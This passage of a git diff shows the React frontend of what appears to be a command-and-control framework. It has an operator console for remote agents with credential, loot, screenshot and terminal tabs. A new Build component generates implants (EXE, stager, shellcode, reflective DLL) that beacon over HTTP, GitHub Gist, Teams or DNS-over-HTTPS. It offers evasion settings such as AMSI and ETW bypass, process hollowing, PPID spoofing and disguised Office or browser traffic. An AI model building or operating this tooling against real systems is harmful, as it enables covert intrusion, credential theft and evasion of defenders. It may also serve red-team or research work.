Object.keys(slotsNow).length > 0) { + const placed = Object.values(slotsNow) + const aid = [...msNow].find(id => !placed.includes(id)) ?? [...msNow][0] + snapToZone(aid, dir) + useAgentStore.getState().clearMultiSelect() + if (tab !== 'TERMINAL') setTab('TERMINAL') + } + chordDir.current = null + setChordHint(null) + }, 600) + } + return + } + + if ((e.key === 'ArrowDown' || e.key === 'ArrowUp') && chordDir.current) { + const v = e.key === 'ArrowDown' ? 'b' : 't' + const h = chordDir.current[0] + commit(v + h) + } + } + window.addEventListener('keydown', onKey) + return () => { window.removeEventListener('keydown', onKey); clearTimeout(chordTimeout.current) } + }, [tab, snapToZone]) + + /* ── Quick command from palette ── */ + const handleRunCommand = useCallback( + async (item) => { + const agent = useAgentStore.getState().selectedAgent; + if (!agent) return; + sendTask(agent.agent_id, item.cmd, item.args); + }, + [sendTask], + ); + + /* ── Resizable sidebars ── */ + const [sidebarW, setSidebarW] = useState(260); + const dragging = useRef(false); + const startX = useRef(0); + const startW = useRef(0); + const handleRef = useRef(null); + + const onMouseDown = useCallback( + (e) => { + e.preventDefault(); + dragging.current = true; + startX.current = e.clientX; + startW.current = sidebarW; + handleRef.current?.classList.add("dragging"); + }, + [sidebarW], + ); + + const [detailW, setDetailW] = useState(280); + const detailDragging = useRef(false); + const detailStartX = useRef(0); + const detailStartW = useRef(0); + const detailHandleRef = useRef(null); + + const onDetailMouseDown = useCallback( + (e) => { + e.preventDefault(); + detailDragging.current = true; + detailStartX.current = e.clientX; + detailStartW.current = detailW; + detailHandleRef.current?.classList.add("dragging"); + }, + [detailW], + ); + + const [windowW, setWindowW] = useState(window.innerWidth); + + useEffect(() => { + const onMove = (e) => { + if (dragging.current) { + setSidebarW(Math.max(180, Math.min(480, startW.current + e.clientX - startX.current))); + } + if (detailDragging.current) { + setDetailW(Math.max(180, Math.min(500, detailStartW.current - (e.clientX - detailStartX.current)))); + } + }; + const onUp = () => { + dragging.current = false; + handleRef.current?.classList.remove("dragging"); + detailDragging.current = false; + detailHandleRef.current?.classList.remove("dragging"); + }; + const onResize = () => setWindowW(window.innerWidth); + window.addEventListener("mousemove", onMove); + window.addEventListener("mouseup", onUp); + window.addEventListener("resize", onResize); + return () => { + window.removeEventListener("mousemove", onMove); + window.removeEventListener("mouseup", onUp); + window.removeEventListener("resize", onResize); + }; + }, []); + + const detailVisible = showDetail && windowW >= 900; + + if (!token) + return ( + <> + + + + ); + + const onlineCount = agents.filter((a) => a.is_active).length; + + return ( + <> + + + + {showPalette && ( + setShowPalette(false)} + onOpenTerminal={() => setTab("TERMINAL")} + onRunCommand={handleRunCommand} + /> + )} + +
+ {/* ── Top bar ── */} +
+ +
+ + {isAdmin && + (killConfirm ? ( +
+ + KILL ALL? + + + +
+ ) : ( + + ))} + +
+ + {/* ── Body ── */} +
+ {/* Sidebar */} + + + {/* Resize handle */} +
+ + {/* Main panel */} +
e.preventDefault()) : undefined}> + {/* Tab bar */} +
+ {TABS.map((t) => ( + + ))} +
+ {/* Indicateur chord Ctrl+flèche en attente */} + {chordHint && ( +
+ Ctrl+ + {chordHint === 'right' ? '→' : '←'} + → ½ ou ↑↓ pour ¼ +
+ )} +
+ + {/* ── Console tab chips ── */} + {tab === "TERMINAL" && ( +
+ {consoleTabs.length === 0 && ( +
NO SESSIONS
+ )} + {consoleTabs.map(agent => { + const inSlot = Object.values(termSlots).includes(agent.agent_id) + const alias = agentAliases?.[agent.agent_id] + const displayName = alias || agent.agent_id + const isRenaming = renameTarget === agent.agent_id + return ( +
{ + e.dataTransfer.setData('tab', agent.agent_id) + setDragTab(agent.agent_id) + }} + onDragEnd={isRenaming ? undefined : () => setDragTab(null)} + onClick={isRenaming ? undefined : () => clickTabChip(agent.agent_id)} + title="clic = solo · double-clic nom = renommer · glisser = split" + > + + {isRenaming ? ( + setRenameValue(e.target.value)} + onKeyDown={e => { + if (e.key === 'Enter') { + if (renameValue.trim()) setAgentAlias(agent.agent_id, renameValue.trim()) + setRenameTarget(null) + } + if (e.key === 'Escape') setRenameTarget(null) + }} + onBlur={() => { + if (renameValue.trim()) setAgentAlias(agent.agent_id, renameValue.trim()) + setRenameTarget(null) + }} + onClick={e => e.stopPropagation()} + style={{ + background: 'transparent', border: 'none', + borderBottom: '1px solid #ff3131', color: '#ff3131', + fontFamily: 'inherit', fontSize: 11, width: 90, + outline: 'none', padding: 0, + }} + /> + ) : ( + { + e.stopPropagation() + setRenameTarget(agent.agent_id) + setRenameValue(alias || agent.agent_id) + }} + >{displayName} + )} + {alias && !isRenaming && ( + + )} + +
+ ) + })} +
+ )} + + {/* Content */} +
+ {/* Terminal — toujours monté, caché par display:none hors onglet pour préserver xterm */} +
+ {(() => { + const layout = getTermLayout(termSlots) + if (layout === 'empty') return + const rp = (slot) => ( + + ) + const vd =
+ const hd =
+ return ( +
+ {/* Overlay drag */} +
e.preventDefault()} + > + dropToZone('left')} + style={{ position:'absolute', left:16, top:'22%', bottom:'22%', width:90 }} /> + dropToZone('right')} + style={{ position:'absolute', right:16, top:'22%', bottom:'22%', width:90 }} /> + dropToZone('tl')} + style={{ position:'absolute', top:16, left:120, width:130, height:110 }} /> + dropToZone('tr')} + style={{ position:'absolute', top:16, right:120, width:130, height:110 }} /> + dropToZone('bl')} + style={{ position:'absolute', bottom:16, left:120, width:130, height:110 }} /> + dropToZone('br')} + style={{ position:'absolute', bottom:16, right:120, width:130, height:110 }} /> +
+ GLISSER VERS UN COIN +
+
+ {layout === 'solo' && rp('full')} + {layout === 'hsplit' && <>{rp('left')}{vd}{rp('right')}} + {layout === 'quad' && ( +
+
+ {rp('tl')}
{rp('tr')} +
+ {hd} +
+ {rp('bl')}
{rp('br')} +
+
+ )} +
+ ) + })()} +
+ + {tab === "TASKS" && + (selectedAgent ? ( + + ) : ( + + ))} + {tab === "FILES" && + (selectedAgent ? ( + + ) : ( + + ))} + {tab === "LOGS" && } + {tab === "CREDS" && } + {tab === "SHOTS" && (selectedAgent + ? + : )} + {tab === "LOOT" && (selectedAgent + ? + : )} + {tab === "MAP" && } + {tab === "BUILD" && } + {tab === "USERS" && } +
+
+ + {/* Detail panel resize handle */} + {detailVisible && ( +
+ )} + + {/* Detail panel */} + setTab("TERMINAL")} + onOpenFiles={() => setTab("FILES")} + onOpenTasks={() => setTab("TASKS")} + /> +
+ + {/* ── Status bar ── */} +
+ + {wsConnected ? "●" : "○"} WS + + + + a.is_active).length > 0 + ? "#3fb950" + : "#888888", + }} + > + {agents.filter((a) => a.is_active).length} + + /{agents.length} + AGENTS + + + + {jwtPayload.sub || "operator"} + {isAdmin && ( + + )} + + + + {clock} + + + + built by khaotic.fr + +
+
+ + ); +} + +function getTermLayout(slots) { + if (Object.values(slots).filter(Boolean).length === 0) return 'empty' + if (slots.tl || slots.tr || slots.bl || slots.br) return 'quad' + if (slots.left || slots.right) return 'hsplit' + return 'solo' +} + +function TerminalPane({ agentId, consoleTabs }) { + const agent = consoleTabs.find(a => a.agent_id === agentId) + if (!agentId || !agent) return ( +
+ EMPTY +
+ ) + return ( +
+ +
+ ) +} + +function DropZone({ label, icon, onDrop, style }) { + const [over, setOver] = useState(false) + return ( +
{ e.preventDefault(); setOver(true) }} + onDragLeave={() => setOver(false)} + onDrop={e => { e.preventDefault(); setOver(false); onDrop() }} + > + {icon} + {label} +
+ ) +} + +function NoSel() { + return ( +
+
+
+ ⊡ +
+

+ SELECT AN AGENT +

+

+ click a session in the sidebar +

+
+
+ ); +} + +const s = { + toolbar: { + display: "flex", + alignItems: "center", + height: 32, + padding: "0 12px", + background: "#0d0d0d", + borderBottom: "1px solid #1a1a1a", + flexShrink: 0, + }, + shell: { + display: "flex", + flexDirection: "column", + height: "100vh", + background: "#0a0a0a", + }, + topBar: { + display: "flex", + alignItems: "center", + gap: 10, + height: 48, + padding: "0 16px", + background: "#111111", + borderBottom: "1px solid #1e1e1e", + flexShrink: 0, + }, + topSep: { width: 1, height: 20, background: "#1e1e1e", flexShrink: 0 }, + topInfo: { display: "flex", alignItems: "center", gap: 7 }, + dot: { width: 7, height: 7, borderRadius: "50%", flexShrink: 0 }, + infoTxt: { fontSize: 11, color: "#888888", letterSpacing: 2 }, + activeChip: { + fontSize: 10, + color: "#888888", + letterSpacing: 1, + padding: "3px 10px", + background: "#0a0a0a", + border: "1px solid #1e1e1e", + }, + body: { display: "flex", flex: 1, overflow: "hidden" }, + sidebar: { + background: "#0a0a0a", + borderRight: "1px solid #1e1e1e", + display: "flex", + flexDirection: "column", + overflow: "hidden", + flexShrink: 0, + }, + main: { + flex: 1, + display: "flex", + flexDirection: "column", + overflow: "hidden", + minWidth: 0, + }, + tabBar: { + display: "flex", + alignItems: "center", + height: 38, + padding: "0 4px", + background: "#111111", + borderBottom: "1px solid #1e1e1e", + flexShrink: 0, + }, + tabBtn: { + background: "transparent", + border: "none", + padding: "0 16px", + height: "100%", + fontSize: 10, + fontFamily: "inherit", + letterSpacing: 2, + color: "#888888", + display: "flex", + alignItems: "center", + }, + consoleTabBar: { + display: "flex", + alignItems: "stretch", + height: 36, + background: "#0a0a0a", + borderBottom: "1px solid #1e1e1e", + flexShrink: 0, + overflowX: "auto", + overflowY: "hidden", + }, + content: { + flex: 1, + overflow: "hidden", + display: "flex", + flexDirection: "column", + position: "relative", + }, + statusBar: { + display: "flex", + alignItems: "center", + height: 26, + padding: "0 16px", + background: "#111111", + borderTop: "1px solid #1e1e1e", + flexShrink: 0, + gap: 12, + }, + sbItem: { fontSize: 11, color: "#888888", letterSpacing: 1 }, + sbSep: { color: "#1e1e1e", fontSize: 9 }, +}; \ No newline at end of file diff --git a/ui/src/components/Build.jsx b/ui/src/components/Build.jsx new file mode 100644 index 0000000..745aad0 --- /dev/null +++ b/ui/src/components/Build.jsx @@ -0,0 +1,538 @@ +import { useState, useCallback, useEffect } from 'react' +import useAgentStore, { API_BASE as API } from '../store/useAgentStore' + +// ─── data ─────────────────────────────────────────────────────────────────── + +const OUTPUTS = [ + { id: 'standalone', label: 'EXE', sub: 'standalone agent', file: 'agent.exe' }, + { id: 'stager', label: 'STAGER', sub: 'staged loader', file: 'stager.exe' }, + { id: 'shellcode', label: 'BIN', sub: 'raw shellcode', file: 'agent.bin' }, + { id: 'reflective_dll', label: 'DLL', sub: 'reflective dll', file: 'agent.dll' }, +] + +const CHANNELS = [ + { id: 'http', label: 'HTTP' }, + { id: 'github', label: 'GIST' }, + { id: 'teams', label: 'TEAMS' }, + { id: 'doh', label: 'DoH' }, +] + +const HTTP_PROFILES = [ + { id: 'default', label: 'Default' }, + { id: 'browser', label: 'Browser' }, + { id: 'office', label: 'Office' }, + { id: 'custom', label: 'Custom' }, +] + +const PROFILE_PRESETS = { + default: { http_useragent: '', http_extra_headers: '' }, + browser: { + http_useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', + http_extra_headers: 'Referer: https://www.google.com\nAccept-Language: en-US,en;q=0.9', + }, + office: { + http_useragent: 'Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.17531; Pro)', + http_extra_headers: 'X-Session-ID: 00000000-0000-0000-0000-000000000000\nX-Application: Word', + }, + custom: { http_useragent: '', http_extra_headers: '' }, +} + +const EVASION = [ + 'Sleep obfuscation', 'Stack spoofing', 'ETW bypass', 'AMSI bypass', + 'Indirect syscalls', 'ntdll unhooking', 'XOR config', 'PPID spoofing', + 'No console window', 'Process hollowing', +] + +const DEFAULT_CFG = { + output: 'standalone', channel: 'http', + beacon_url: 'http://127.0.0.1:8000/beacon', + stage_server_url: 'http://127.0.0.1:8000', + beacon_interval: 30000, jitter_pct: 40, kill_date: '', + github_token: '', gist_cmd: '', gist_out: '', + teams_tenant: '', teams_client: '', teams_secret: '', + teams_webhook: '', teams_team_id: '', teams_channel: '', + doh_domain: 'c2.khaotic.fr', + http_profile: 'default', http_useragent: '', http_extra_headers: '', http_cert_pin: '', +} + +// ─── helpers ──────────────────────────────────────────────────────────────── + +function ts() { return new Date().toTimeString().slice(0, 8) } +function fmtMs(ms) { + if (ms < 1000) return ms + ' ms' + if (ms < 60000) return (ms / 1000) + 's' + return (ms / 60000).toFixed(1) + 'm' +} + +async function sha256hex(blob) { + const buf = await blob.arrayBuffer() + const digest = await crypto.subtle.digest('SHA-256', buf) + return Array.from(new Uint8Array(digest)).map(b => b.toString(16).padStart(2, '0')).join('') +} + +const PRESETS_KEY = 'khaos_build_presets' + +// ─── main component ───────────────────────────────────────────────────────── + +export default function Build() { + const { token } = useAgentStore() + const [cfg, setCfg] = useState(DEFAULT_CFG) + const [status, setStatus] = useState('idle') + const [logs, setLogs] = useState([]) + const [errs, setErrs] = useState({}) + const [presets, setPresets] = useState(() => { + try { return JSON.parse(localStorage.getItem(PRESETS_KEY) || '{}') } catch { return {} } + }) + const [copied, setCopied] = useState(false) + + const set = useCallback((k, v) => { + setCfg(p => ({ ...p, [k]: v })) + setErrs(e => { const n = { ...e }; delete n[k]; return n }) + }, []) + + const applyProfile = (id) => { + setCfg(p => ({ ...p, http_profile: id, ...(PROFILE_PRESETS[id] || PROFILE_PRESETS.default) })) + } + + const log = (msg, type = 'info') => setLogs(l => [...l, { ts: ts(), msg, type }]) + + // ── presets ── + const savePreset = () => { + const name = prompt('Preset name (e.g. prod, lab):') + if (!name || !name.trim()) return + const next = { ...presets, [name.trim()]: cfg } + setPresets(next) + localStorage.setItem(PRESETS_KEY, JSON.stringify(next)) + } + const loadPreset = (name) => { setCfg(presets[name]); setErrs({}) } + const deletePreset = (name) => { + const next = { ...presets }; delete next[name] + setPresets(next) + localStorage.setItem(PRESETS_KEY, JSON.stringify(next)) + } + + // ── copy beacon URL ── + const copyBeacon = () => { + navigator.clipboard.writeText(cfg.beacon_url).then(() => { + setCopied(true); setTimeout(() => setCopied(false), 1500) + }) + } + + const validate = () => { + const e = {} + if (cfg.channel === 'http' && !cfg.beacon_url.trim()) e.beacon_url = 1 + if (cfg.output === 'stager' && !cfg.stage_server_url.trim()) e.stage_server_url = 1 + if (cfg.channel === 'github') { + if (!cfg.github_token.trim()) e.github_token = 1 + if (!cfg.gist_cmd.trim()) e.gist_cmd = 1 + if (!cfg.gist_out.trim()) e.gist_out = 1 + } + if (cfg.channel === 'teams') { + if (!cfg.teams_tenant.trim()) e.teams_tenant = 1 + if (!cfg.teams_client.trim()) e.teams_client = 1 + if (!cfg.teams_secret.trim()) e.teams_secret = 1 + if (!cfg.teams_webhook.trim()) e.teams_webhook = 1 + } + if (cfg.channel === 'doh' && !cfg.doh_domain.trim()) e.doh_domain = 1 + return e + } + + const build = async () => { + const v = validate() + if (Object.keys(v).length) { setErrs(v); return } + setStatus('building'); setLogs([]) + log(`${cfg.output} · ${cfg.channel} · ${fmtMs(cfg.beacon_interval)} ±${cfg.jitter_pct}%`, 'dim') + try { + const res = await fetch(`${API}/build`, { + method: 'POST', + headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token }, + body: JSON.stringify(cfg), + }) + if (!res.ok) { + const err = await res.json().catch(() => ({ detail: res.statusText })) + log(err.detail || 'build failed', 'error') + setStatus('error'); return + } + const blob = await res.blob() + const outFile = OUTPUTS.find(o => o.id === cfg.output)?.file || 'agent.exe' + const url = URL.createObjectURL(blob) + const a = document.createElement('a'); a.href = url; a.download = outFile + document.body.appendChild(a); a.click(); document.body.removeChild(a) + URL.revokeObjectURL(url) + log(`${outFile} — ${(blob.size / 1024).toFixed(1)} KB`, 'ok') + sha256hex(blob).then(h => log(`sha256 ${h}`, 'dim')) + setStatus('ok') + } catch (e) { + log(e.message, 'error') + setStatus('error') + } + } + + const reset = () => { setCfg(DEFAULT_CFG); setErrs({}); setStatus('idle'); setLogs([]) } + const outFile = OUTPUTS.find(o => o.id === cfg.output)?.file || 'agent.exe' + const building = status === 'building' + const presetNames = Object.keys(presets) + + return ( +
+ + {/* ══════════════ LEFT PANEL — config ══════════════ */} +
+ + {/* PRESETS */} + {(presetNames.length > 0 || true) && ( +
+ PRESETS + {presetNames.map(n => ( +
+ + +
+ ))} + +
+ )} + + {/* FORMAT */} +
+
+ {OUTPUTS.map(o => ( + set('output', o.id)}> +
{o.label}
+
{o.file}
+
+ ))} +
+ {cfg.output === 'stager' && ( + + set('stage_server_url', v)} placeholder="http://..." mono err={errs.stage_server_url} /> + + )} +
+ + {/* TRANSPORT */} +
+
+ {CHANNELS.map(c => ( + set('channel', c.id)}>{c.label} + ))} +
+ + {cfg.channel === 'http' && ( + <> + +
+ set('beacon_url', v)} placeholder="http://host:port/path" mono err={errs.beacon_url} /> + +
+
+ +
+ {HTTP_PROFILES.map(p => ( + applyProfile(p.id)}>{p.label} + ))} +
+
+ {cfg.http_profile !== 'default' && ( + <> + + set('http_useragent', v)} placeholder="Leave empty for default" mono /> + + +